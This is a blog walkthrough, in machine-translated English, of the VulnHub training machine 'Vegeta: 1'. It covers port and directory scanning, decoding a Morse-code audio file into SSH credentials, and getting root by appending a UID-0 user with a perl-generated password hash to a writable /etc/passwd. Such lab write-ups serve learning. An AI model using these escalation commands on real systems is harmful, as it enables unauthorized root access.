当前位置:网站首页>vulnhub Vegeta: 1
vulnhub Vegeta: 1
2022-06-24 22:47:00 【Fairy elephant】
Infiltrate ideas :
nmap scanning ----gobuster Scan the website directory ---- Decode Morse code online , obtain ssh User name, password ----/etc/passwd Write user authorization
environmental information :
Drone aircraft :192.168.101.77
attack :192.168.101.34
Specific steps :
1、nmap scanning
sudo nmap -sV -sC -p- 192.168.101.77
2、dirb Scan the website directory ( Rabbit hole )
dirb http://192.168.101.77Find out http://192.168.101.77/robots.txt

( Below is a rabbit hole )
Browser access http://192.168.101.77/robots.txt, Find out /find_me

Browser access /find_me, Click on find_me.html, And view the web page source code

view-source:http://192.168.101.77/find_me/find_me.html
Pull to the bottom and find a large comment ( No need to copy and paste )

base64 After decoding, there is still a pile of meaningless garbled code , That the road is blocked

3、gobuster Scan the website directory
gobuster dir -u http://192.168.101.77/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txtScan to /bulma

http://192.168.101.77/bulma/ It's a catalog , There's a file in it hahahaha.wav

Download it and listen to it , It feels like Morse code
4、 Decode Morse code online , obtain ssh User name, password
Found an online translator :Morse Code Audio Decoder | Morse Code World
Press upload Upload hahahaha.wav, Then press play, Automatically convert to text messages

And what you get is
USES: TRUNKS PASSWORD : US3R(S IN DOLLPS SYMBOL)

User name trunks, password u$3r Conduct ssh Sign in
ssh [email protected]
5、/etc/passwd Write new user authorization
see /home/trunks/.bash_history, Find a direction /etc/passwd Write to new user

see /etc/passwd File permissions for
ls -al /etc/passwdFind out trunks The user has write permission

Reference resources /home/trunks/.bash_history The command , First use perl Generate encrypted user passwords
perl -le 'print crypt("123456","addedsalt")'Among the above orders , The clear text password of the user is 123456
Then the new users test write in /etc/passwd
echo "test:adrla7IBSfTZQ:0:0:root:/root:/bin/bash" >> /etc/passwd
Finally switch to test user , Input password 123456, get root jurisdiction , And in /root In the directory root.txt
su - test

边栏推荐
- Yyds dry goods inventory junit5 learning II: assumptions class
- win10或win11打印机无法打印
- img2pdf
- Docker 安装 Redis-5.0.12,详细步骤
- The difference between get and post
- See how sparksql supports enterprise data warehouse
- Creating files, recursively creating directories
- AQS source code analysis
- Development specification - parameter verification exception, exception return prompt section
- Technology inventory: past, present and future of Message Oriented Middleware
猜你喜欢

Redis hop table

How to compare two or more distributions: a summary of methods from visualization to statistical testing

大厂面试必问:如何解决TCP可靠传输问题?8张图带你详细学习

The core concept of JMM: happens before principle

Docker installs MySQL 8.0. Detailed steps

The usage difference between isempty and isblank is so different that so many people can't answer it

Web security XSS foundation 06

Docker 安装 MySQL 8.0,详细步骤

Principles of Ethernet port mirroring, link aggregation and VLAN Technology

JMM 最最最核心的概念:Happens-before 原则
随机推荐
使用Aggregated APIServer扩展你的kubernetes API
Based on the codeless platform, users deeply participated in the construction, and digital data + Nanjing Fiberglass Institute jointly built a national smart laboratory solution
ThreadLocal memory leak
STP spanning tree protocol Foundation
Why can some programmers get good offers with average ability?
Seven principles of software design
Panorama of enterprise power in China SSD industry
Data center basic network platform
Wechat side: what is consistent hash? In what scenario? What problems have been solved?
Layer 2 and layer 3 forwarding principle based on VLAN
Redis-跳表
How to compare two or more distributions: a summary of methods from visualization to statistical testing
Source code reading | the process of reading text format STL by openmesh
Leetcode algorithm The first common node of two linked lists
双亲委派机制
YGG recent game partners list
Online filing process
Learn more about the practical application of sentinel
Rip protocol of dynamic routing protocol
中国SSD行业企业势力全景图